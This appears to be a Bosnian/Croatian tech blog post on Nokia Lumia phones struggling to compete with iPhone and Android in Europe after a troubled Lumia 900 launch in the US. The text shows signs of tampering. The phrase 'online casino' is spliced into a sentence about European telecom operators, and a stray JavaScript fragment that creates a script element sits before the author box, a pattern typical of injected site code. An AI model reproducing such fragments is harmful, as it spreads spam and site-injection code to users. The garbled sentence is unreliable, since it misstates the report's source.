Lumia se ne može natjecati sa iPhone i Androidom

Uprkos ranim pokazateljima koji su isticali da će nova Nokia Lumia biti dobro prihvaćena u Evropi,Evropski operateri pokazuju dosta pesimizma da bi se Lumia mogla takmičiti sa iPhone i Android telefonima.

U proteklih nekoliko sedmica Nokia Lumia 900 koji je 4G LTE telefon imao je veoma neobično lansiranje u SAD. Prvo je lansiran na Uskrs kada su mnoge AT&T trgovine bile zatvorene. Zatim se desilo neverovatno, Nokia je uočila veliku softversku grešku na telefonima isporučenim u SAD pa je kompanija odlučila da taj utisak popravi akcijom poklanjanja Lumia 900 telefona koja traje do 21. aprila.

Nokia se teško prilagođava novim zahtjevima korisnika na tržištu SAD-a po pitanju pametnih telefona što je dovelo do toga da Nokia bukvalno ne postoji na ovom tržištu.

Evropa je trebala biti sasvim druga priča jer su se Nokia pametni telefoni sasvim solidno prodavali,pa se smatralo da će korisnici dati priliku Nokia Windows telefonima.

Međutim, posljednji izvještaji četiri evropska online casino telekoma govore da Nokia Lumia telefoni jednostavno nisu dovoljno kvalitetni da bi se takmičili sa iPhone i Android telefonima.

Lumia 800 i Lumia 710 u Evropi su dostupni od novembra. U prošlom kvartalu kompanija je prodala 2 miliona Lumia telefona, uz napomenu da je većina prodaje došla iz Evrope. Poređenja radi, Apple je u istom periodu prodao 37 miliona iPhone-a širom sveta.

Pred kompanijom Nokia je težak put na kojem mora da vrati svoj kredibilitet, s tim da mora da se fokusira na proizvodnju dobrih pametnih telefona.

var d=document;var s=d.createElement(‘script’);

Autor

Tehnografija je tehnološki blog koji svakodnevno donosi novosti iz društvenih mreža, internet startupa, mobilnih tehnologija, zanimljivih tehnoloških događaja te operativnih sistema. No, to nije sve. Kvalitetne recenzije, i jednostavni tutorijali će vam pokazati da svijet Interneta uopće nije tako složen, kako izgleda na prvi pogled.